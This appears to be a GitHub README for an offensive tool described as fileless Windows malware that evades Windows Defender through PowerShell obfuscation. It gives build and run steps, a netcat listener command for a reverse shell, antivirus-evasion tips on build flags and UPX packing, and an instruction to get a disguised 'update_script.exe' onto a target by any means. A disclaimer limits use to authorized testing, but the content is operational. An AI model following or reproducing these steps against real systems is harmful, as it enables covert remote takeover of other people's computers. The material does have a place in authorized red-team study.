!!! FOR SECURITY TESTING PURPOSES ONLY !!!
******************************************************
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!
Fileless malware that bypasses Windows Defender using PowerShell and obfuscation.
Just a simple Reverse Shell using a batch script to kick things off, after which everything is fileless.
YouTube video demonstration and explanation >>> https://youtu.be/LjoAV3O40og
Setup and Execution
- Clone this repo
git clone https://github.com/daniellowrie/update_script - Build SecUp.go
go build SecUp.go - Run SecUp
./SecUp 192.168.1.200 - Open another terminal, and start a Listener on port 443 (sudo if not root)
sudo nc -vnlp 443 - Open another terminal, and compile EXE
GOOS=windows go build update_script.go
- A word about comipiling for Windows...
- I've experienced Golang binaries getting flagged as malware, even "Hello, World!"
- I've read that removing
-ldflagsand-trimpathmay help and that the standard build is best for AV evasion - I've also read that packing can trip AV detection as well and again the standard build is best for AV evasion
- BUT if you'd like to make the binary smaller...
GOOS=windows go build -ldflags "-s -w" -trimpath update_script.goupx -9 update_script.exe
- BUT if you'd like to make the binary smaller...
- I've read that removing
- I've experienced Golang binaries getting flagged as malware, even "Hello, World!"
- Back at the SecUp terminal
Press ENTER to continue... - Upload and execute
update_script.exeto target any way you like - Shellz! :)